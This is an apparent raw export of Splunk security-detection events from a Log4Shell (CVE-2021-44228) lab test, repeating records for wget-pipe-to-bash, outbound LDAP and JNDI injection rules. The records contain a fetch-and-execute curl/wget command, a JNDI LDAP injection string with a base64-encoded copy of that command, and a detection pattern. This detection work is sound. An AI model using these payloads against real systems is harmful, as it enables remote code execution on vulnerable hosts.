annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643954, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="PR.PT", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="CIS 12", 
annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use LDAP servers in organizations. Outbound LDAP traffic should not be allowed through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643951, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", 
risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are specific targets of this injection, particularly projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching capabilities, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. 
If you see results for this detection, it means that there was an attempt at injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643954, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="PR.PT", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Source:Endpoint", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use LDAP servers in organizations. Outbound LDAP traffic should not be allowed through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643951, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are specific targets of this injection, particularly projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching capabilities, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. If you see results for this detection, it means that there was an attempt at injection, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool 